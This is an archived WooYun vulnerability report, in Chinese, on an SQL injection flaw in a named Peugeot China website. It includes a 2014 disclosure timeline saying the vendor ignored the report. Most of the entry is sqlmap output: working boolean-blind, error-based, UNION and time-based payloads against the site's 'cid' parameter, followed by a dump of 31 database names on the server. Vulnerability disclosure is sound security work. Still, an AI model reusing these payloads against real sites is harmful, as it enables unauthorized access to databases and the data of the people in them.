乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-07-29: 厂商已经主动忽略漏洞,细节向公众公开
SQL注入
无。
http://408.peugeot.com.cn/show.php?cid=57
Place: GETParameter: cid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=57' AND 5637=5637 AND 'eQJn'='eQJn Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cid=57' AND (SELECT 2660 FROM(SELECT COUNT(*),CONCAT(0x716d667371,(SELECT (CASE WHEN (2660=2660) THEN 1 ELSE 0 END)),0x717a7a6171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AIGk'='AIGk Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: cid=-1158' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716d667371,0x4d7a727861627459666e,0x717a7a6171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cid=57' AND SLEEP(5) AND 'HBaU'='HBaU---available databases [31]:[*] 2014happy[*] 24hours[*] 3015db[*] 308[*] 308powertogo[*] 50db[*] biaozhidashisai[*] happy3008[*] hei3008[*] hobby[*] information_schema[*] lemans[*] mysql[*] performance_schema[*] peugeot301[*] peugeot408[*] peugeot_2008_m[*] peugeot_3008[*] peugeot_3008_1year[*] peugeot_3008_1year_m[*] peugeot_3008_3D[*] peugeot_3008_happy[*] peugeot_408_jy[*] peugeot_club_35group_2[*] peugeot_cn[*] puzzlegame[*] rcz[*] sport[*] team[*] test[*] zhengyan
你们懂
未能联系到厂商或者厂商积极拒绝